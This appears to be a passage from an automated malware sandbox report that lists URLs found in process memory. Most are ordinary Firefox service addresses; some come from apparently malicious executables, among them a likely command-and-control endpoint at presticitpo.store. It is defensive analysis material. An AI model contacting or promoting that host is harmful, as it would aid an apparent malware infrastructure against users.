Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001D.00000002.2976416417.000001E75FE03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001D.00000003.2861629695.000001E762700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2869871266.000001E76297B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotsasyncEmitManifestEntry(
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881C:
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881The
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001D.00000002.2964932071.000001E75E67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001D.00000002.2992758898.000001E7637B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%Attempt
Source: firefox.exe, 0000001D.00000002.2992758898.000001E7637C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E76378A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2987595176.000001E762D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2976416417.000001E75FE21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FDD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource:///modules/BrowserContentHandler.sys.mjss
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource://gre/modules/handlers/HandlerList.sys.mj
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sCan
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sScheme
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2955106076.000001E752CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.comtestPermissionFromPrincipalhttps://addons.mozilla.orghttps://screenshots.
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001D.00000002.3011405612.00002751D9304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store:443/apik
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/recordDataMigrationResult
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jscolor-mix(in
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelresource://gre/modules/PrivateBrowsingUtils.sys.
Source: file.exe, 00000000.00000003.1732680990.0000000005E71000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606378273.000000000580E000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2738826950.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2806986423.0000000005B10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/dispatchAsyncEvent/this._blockersPromi
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3005403457.000001E764FC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/Exception
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2553620805.0000000029892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000003.1732680990.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008AF000.00000040.00000001.01000000.00000009.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008A8000.00000040.00000001.01000000.00000009.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2269794608.000000001D6EC000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606378273.000000000580C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606825892.0000000005805000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2738826950.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739201771.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2806986423.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2807333206.0000000005B07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 